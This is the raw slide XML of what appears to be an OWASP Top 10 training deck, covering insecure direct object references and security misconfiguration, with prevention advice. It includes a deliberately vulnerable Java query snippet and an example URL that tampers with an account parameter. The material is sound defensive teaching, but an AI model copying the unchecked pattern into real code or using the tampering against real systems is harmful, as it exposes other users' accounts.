Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Data_Valid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5800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67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57104366"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="952281"/>
          <a:ext cx="6858000" cy="252898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1107">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4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91641">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the types of users of your system. Do any users have only partial access to certain types of system data?</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who is an authorized system user, simply changes a parameter value that directly refers to a system object to another object the user isn’t authorized for. Is access granted?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Applications frequently</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw. Testers can easily manipulate parameter values to detect such flaws. Code analysis quickly shows whether authorization is properly verified.</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can compromise all the data that can be referenced by the parameter. Unless object references are unpredictable,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> it’s easy for an attacker to access all available data of that type.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exposed data</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unverified data in a SQL call that is accessing account information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  String query = "SELECT * FROM accts WHERE account = ?";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  PreparedStatement pstmt =</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  connection.prepareStatement(query , … );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  pstmt.setString( 1, request.getParameter("acct"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ResultSet results = pstmt.executeQuery( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The attacker simply modifies the ‘acct’ parameter in her browser to send whatever account number she wants. If not properly verified, the attacker can access any user’s account, instead of only the intended customer’s account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>notmyacct</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRP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is vulnerable to insecure direct object references is to verify that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object references have appropriate defenses. To achieve this, consider:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>direct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>references to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>restricted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resources, does the application fail to verify the user is authorized to access the exact resource they have requested?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the reference is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>indirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reference, does the mapping to the direct </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reference fail to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>limit the values to those authorized for the current user?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code review of the application can quickly verify whether either approach is implemented safely. Testing is also effective for identifying direct object references and whether they are safe. Automated tools typically do not look for such flaws because they cannot recognize what requires protection or what is safe or unsafe.</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Insecure Dir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ESAPI Access Reference Map </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>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ESAPI Access Control API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (See isAuthorizedForData(), isAuthorizedForFile(), isAuthorizedForFunction() )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For additional access control requirements, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>ASVS requirements area for Access Control (V4)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a: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639 on Insecure Direct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22 on Path Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(an example of a Direct Object Reference attack)</a:t>
            </a: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insecure direct object references requires selecting an approach for protecting each user accessible object (e.g., object number, filename):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use per user or session indirect object references</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. This prevents attackers from directly targeting unauthorized resources. For example, instead of using the resource’s database key, a drop down list of six resources authorized for the current user could use the numbers 1 to 6 to indicate which value the user selected. The application has to map the per-user indirect reference back to the actual database key on the server. OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> includes both sequential and random access reference maps that developers can use to eliminate direct object references. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Each use of a direct object reference from an untrusted source must include an access control check to ensure the user is authorized for the requested object.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Insecure Direct Object References</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A4</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261496277"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948521"/>
          <a:ext cx="6858000" cy="2536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82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51035">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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anonymous external attackers as well as users with their own accounts that may attempt to compromise the system. Also consider insiders wanting to disguise their actions.</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accesses default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, database, framework, and custom code. Developers and system administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.</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frequently give attackers unauthorized access to some system data or functionality</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Occasionally, such flaws result in a complete system compromise.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The system could be completely compromised without you knowing it</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. All of your data could be stolen or modified slowly over time. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Recovery costs could be expensive.</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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Directory listing is not disabled on your server. Attacker discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>decompiles and reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>engineers to get all your custom code. She then finds a serious access control flaw in your application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: App server comes with sample applications that are not removed from your production server. Said sample applications have well known security flaws attackers can use to compromise your server.</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Attack?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is your application missing the proper security hardening across any part of the application stack? Including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is any of your software out of date? This includes the OS, Web/App Server, DBMS, applications, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all code libraries (see new A9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are any unnecessary features enabled or installed (e.g., ports, services, pages, accounts, privileges)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are default accounts and their passwords still enabled and unchanged?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Does your error handling reveal stack traces or other overly informative error messages to users?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are the security settings in your development frameworks (e.g., Struts, Spring, ASP.NET) and libraries not set to secure values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Without a concerted, repeatable application security configuration process, systems are at a higher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>risk.</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Development Guide: Chapter on Configuration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Code Review Guide: Chapter on Error Handling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Testing Guide: Configuration Management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u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Error Codes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Top 10 2004 - Insecure Configuration Management </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For additional requirements in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ASVS requirements area for Security Configuration (V12)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</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PC Magazine Article on Web Server Hardening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2 on Environmental Security Flaws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CIS Security Configuration Guides/Benchmarks</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The primary recommendations are to establish all of the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different passwords used in each environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). This process should be automated to minimize the effort required to setup a new secure environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This needs to include </a:t>
            </a:r>
            <a:r>
